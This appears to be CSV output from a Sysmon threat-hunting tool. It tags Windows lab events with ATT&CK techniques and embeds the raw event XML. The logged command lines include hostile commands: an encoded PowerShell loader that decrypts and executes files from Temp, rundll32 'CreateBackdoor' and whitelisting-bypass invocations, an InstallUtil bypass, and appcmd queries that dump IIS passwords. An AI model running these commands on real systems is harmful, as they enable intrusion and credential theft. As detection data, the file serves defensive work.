+ +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7681 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:22:05.660 + 365ABB72-9C9D-5D04-0000-001039CE1600 + 172 + C:\Windows\System32\wscript.exe + 5.8.7600.16385 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983 + 365ABB72-9C8E-5D04-0000-0010D0421600 + 540 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4900 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:13.169 + 747F3D96-6619-5D3F-0000-0010FDE78600 + 5116 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5973 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.924 + 365ABB72-3D6F-5CEB-0000-001072D7FF00 + 3640 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 13:50:28.662 + 747F3D96-9124-5D45-0000-00103B986101 + 6236 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-9124-5D45-0000-001022926101 + 3180 + C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe + "C:\Users\IEUser\AppData\Local\Temp\fubuki.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5407 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 11:23:17.636 + 747F3D96-6EA5-5D45-0000-001032CCE100 + 6068 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6EA5-5D45-0000-00107AC9E100 + 932 + C:\Windows\SysWOW64\WerFault.exe + C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /groups ) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6170 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:38.270 + 365ABB72-FE66-5CEB-0000-0010C7F80B00 + 1168 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /groups + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-FE66-5CEB-0000-001058F50B00 + 3256 + C:\Windows\System32\cmd.exe + cmd.exe /c whoami /groups + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 557006 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:15.285 + 747F3D96-183B-610F-0000-0010DC6CD400 + 11324 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00000000-0000-0000-0000-000000000000 + 1108 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine ("C:\Windows\System32\sysprep\sysprep.exe") in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17729 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:51.728 + 365ABB72-28D3-5CDA-0000-001088C71300 + 3976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\WindowsPowerShell\v1.0\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002045350100 + 0x13545 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-28D3-5CDA-0000-00106DC31300 + 3068 + C:\Windows\System32\sysprep\sysprep.exe + "C:\Windows\System32\sysprep\sysprep.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243523 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.544 + 747F3D96-9F61-5E75-0000-001056711E00 + 7380 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17729 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:51.728 + 365ABB72-28D3-5CDA-0000-001088C71300 + 3976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" + C:\Windows\system32\WindowsPowerShell\v1.0\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002045350100 + 0x13545 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-28D3-5CDA-0000-00106DC31300 + 3068 + C:\Windows\System32\sysprep\sysprep.exe + "C:\Windows\System32\sysprep\sysprep.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424081 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:17.171 + 747F3D96-51F9-5F93-0000-001003125E00 + 7552 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 00000000-0000-0000-0000-000000000000 + 1216 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5970 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.834 + 365ABB72-3D6F-5CEB-0000-0010B2D3FF00 + 3848 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG